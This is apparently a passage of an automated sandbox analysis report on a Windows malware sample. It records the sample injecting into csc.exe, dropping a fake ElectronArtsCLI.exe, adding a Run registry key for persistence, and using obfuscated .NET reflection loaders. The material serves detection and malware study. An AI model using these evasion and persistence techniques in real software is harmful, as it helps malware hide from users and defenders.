              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094858383_2_09485838
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09486B923_2_09486B92
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09489A933_2_09489A93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09489FF53_2_09489FF5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094870083_2_09487008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0948A02C3_2_0948A02C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094845A83_2_094845A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C7EF73_2_094C7EF7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F00403_2_095F0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F10D83_2_095F10D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F03673_2_095F0367
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00424A8C appears 161 times
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: String function: 00428B04 appears 54 times
              Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: 3XSXmrEOw7.exeStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
              Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: ElectronArtsCLI.exe.0.drStatic PE information: Resource name: RT_STRING type: PDP-11 demand-paged pure executable not stripped
              Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilename vs 3XSXmrEOw7.exe
              Source: 3XSXmrEOw7.exe, 00000000.00000000.1320237354.00000000005B1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
              Source: 3XSXmrEOw7.exeBinary or memory string: OriginalFilenameAutoRun7.exeP vs 3XSXmrEOw7.exe
              Source: 3XSXmrEOw7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, CentralIterator.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, DetachedCalc.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, DetachedCalc.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, hIKm5xdfOG6UqF42bjx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, UuINIkdXDBG5e46ex3q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal96.evad.winEXE@3/1@3/2
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F650 GetModuleHandleA,GetProcAddress,SetLastError,SetLastError,SetLastError,GetDiskFreeSpaceA,0_2_0040F650
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F900 CoInitialize,CoCreateInstance,MultiByteToWideChar,0_2_0040F900
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004013D0 LoadResource,LockResource,SizeofResource,0_2_004013D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArtsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nbbnv.exeJump to behavior
              Source: 3XSXmrEOw7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 3XSXmrEOw7.exeReversingLabs: Detection: 28%
              Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - Rpertoire par dfaut *Installation avance - Choix du rpertoireInternet Explorer %s est actuellemen
              Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - R
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile read: C:\Users\user\Desktop\3XSXmrEOw7.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\3XSXmrEOw7.exe "C:\Users\user\Desktop\3XSXmrEOw7.exe"
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 3XSXmrEOw7.exeStatic file information: File size 2605056 > 1048576
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_CURSOR
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_BITMAP
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ICON
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_MENU
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_DIALOG
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_STRING
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ACCELERATOR
              Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_GROUP_ICON
              Source: 3XSXmrEOw7.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x224000
              Source: 3XSXmrEOw7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.1598027769.0000000007F6D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3787355907.00000000093B0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3786417817.0000000006D7E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3790241766.0000000009F30000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3789598393.00000000095A0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.0000000008286000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1598027769.000000000814E000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, DetachedCalc.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.cs.Net Code: Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777250)),Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777305))})
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.cs.Net Code: Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777250)),Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777305))})
              Source: 0.2.3XSXmrEOw7.exe.2310000.1.raw.unpack, CentralIterator.cs.Net Code: MatchIterator System.Reflection.Assembly.Load(byte[])
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.2.csc.exe.95a0000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.3.csc.exe.82860e8.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 3.3.csc.exe.82360c8.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: FaQgOk6ZkC
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: vl0W5T2oSe
              Source: Yara matchFile source: 3.2.csc.exe.9540000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.csc.exe.7ef6e08.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3789474644.0000000009540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3786964807.0000000007E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 5980, type: MEMORYSTR
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041DAB0 push 3B185E89h; ret 0_2_0041DAB9
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424366 push eax; ret 0_2_00424374
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424376 push eax; ret 0_2_0042439C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00428B3F push ecx; ret 0_2_00428B4F
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041CE1E push esp; ret 0_2_0041CE29
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00427E30 push eax; ret 0_2_00427E4E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093B72D1 push ebp; retf 3_2_093B737D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C453B push ecx; iretd 3_2_094C4541
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FE2F0 push esp; ret 3_2_095FE2F1
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.csHigh entropy of concatenated method names: 'EdlfqAAxSq4asn4s2Ne', 'l9FwaFAwKMsJskM5SS2', 'ULWX35OtJK', 'vh0ry9Sq2v', 'FPeXBKLIcd', 'gl7X7GxgH4', 'sOAXXtNN9T', 'M2TXNQ9Hv1', 'QDRaBUYlQe', 'BxWBkkZ0es'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, EQdDeAXU1XRqnCmSnUG.csHigh entropy of concatenated method names: 'qetesG9p96', 'WDkeVsRr8A', 'SlKe22d1Hb', 'KZEe9PDBHk', 'MqMeR1vtlb', 'Syye8sGlPk', 'PKgeUBiWbF', 'WluNQUBMUd', 'XWwe10yo0k', 'JJNei3SGMf'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, DmgZfxFVftVX4nGpCf.csHigh entropy of concatenated method names: 'r1Wrl3iRT', 'F0Hj71PkP', 'ofu4PJmtE', 'dXlGX6NO4', 'ru7tII8RS', 'BJQPgbJ6f', 'jdWsRrDML', 'LsESFMgvB', 'PRHHNfsKZ', 'ibg5oNNrj'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, Ayn1bJ1VAOfw54fj8a.csHigh entropy of concatenated method names: 'gkPDTUQCf', 'd8wM3uvWR', 'SVSKAXtte', 'BpJofeCoO', 'jAlqc9L96', 'XNvZSnYtA', 'dnmvgT4pw', 'tkHp8QKmC', 'GTEO2Zu9jUdXRAfVFcE', 'iAphh7uRxLmOm9iSnyw'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, rUXBNkX62kIkdWvG3y1.csHigh entropy of concatenated method names: 'd4FX55NwX2', 'yLdXbyXX6F', 'cnwXJ0RfcX', 'eFLXfxHWyS', 'beAXsiuwgI', 'vitXVELxpD', 'oNVX2tS0EE', 'FpCX9bvyoE', 'HiFXR5l6Um', 'FHsX8OCiPO'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, IvWVBqISSAu8Lo1NXyU.csHigh entropy of concatenated method names: 'DgEIDqGKIZ', 'OWxDSrCh4etLMjhOKoG', 'T0vkkXCcJHoNqSdKNqu', 'CmEIRyy3Z3', 'uesI8d2uji', 'Ed0I5J3HRg', 'OcZIbC10tS', 'siYIJQbnPQ', 'i17IfYLvQY', 'd6KIsYxvPI'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.csHigh entropy of concatenated method names: 'EdlfqAAxSq4asn4s2Ne', 'l9FwaFAwKMsJskM5SS2', 'ULWX35OtJK', 'vh0ry9Sq2v', 'FPeXBKLIcd', 'gl7X7GxgH4', 'sOAXXtNN9T', 'M2TXNQ9Hv1', 'QDRaBUYlQe', 'BxWBkkZ0es'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.csHigh entropy of concatenated method names: 'qetesG9p96', 'WDkeVsRr8A', 'SlKe22d1Hb', 'KZEe9PDBHk', 'MqMeR1vtlb', 'Syye8sGlPk', 'PKgeUBiWbF', 'WluNQUBMUd', 'XWwe10yo0k', 'JJNei3SGMf'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csHigh entropy of concatenated method names: 'r1Wrl3iRT', 'F0Hj71PkP', 'ofu4PJmtE', 'dXlGX6NO4', 'ru7tII8RS', 'BJQPgbJ6f', 'jdWsRrDML', 'LsESFMgvB', 'PRHHNfsKZ', 'ibg5oNNrj'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, Ayn1bJ1VAOfw54fj8a.csHigh entropy of concatenated method names: 'gkPDTUQCf', 'd8wM3uvWR', 'SVSKAXtte', 'BpJofeCoO', 'jAlqc9L96', 'XNvZSnYtA', 'dnmvgT4pw', 'tkHp8QKmC', 'GTEO2Zu9jUdXRAfVFcE', 'iAphh7uRxLmOm9iSnyw'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, JdSXlyd2vhHvwQ3xmP9.csHigh entropy of concatenated method names: 'LVMdUEHCB6', 'ePDD9PCMjolGyjHyym1', 'EEE4ciCKSDP0VRUno9A', 'TPwdDPtMck', 'pcE7iBCq38kxBF6jxgM', 'mQDxf6CZjc8JCTEf5m5', 'KNJdRASXDY', 'axud8TWJFp', 't70YaOC1YUNwMOdWkSu', 'tAuSjKCiyyXug0mA74c'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, rUXBNkX62kIkdWvG3y1.csHigh entropy of concatenated method names: 'd4FX55NwX2', 'yLdXbyXX6F', 'cnwXJ0RfcX', 'eFLXfxHWyS', 'beAXsiuwgI', 'vitXVELxpD', 'oNVX2tS0EE', 'FpCX9bvyoE', 'HiFXR5l6Um', 'FHsX8OCiPO'
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exeJump to dropped file
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLIJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLIJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00422CCA IsIconic,GetWindowPlacement,GetWindowRect,0_2_00422CCA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
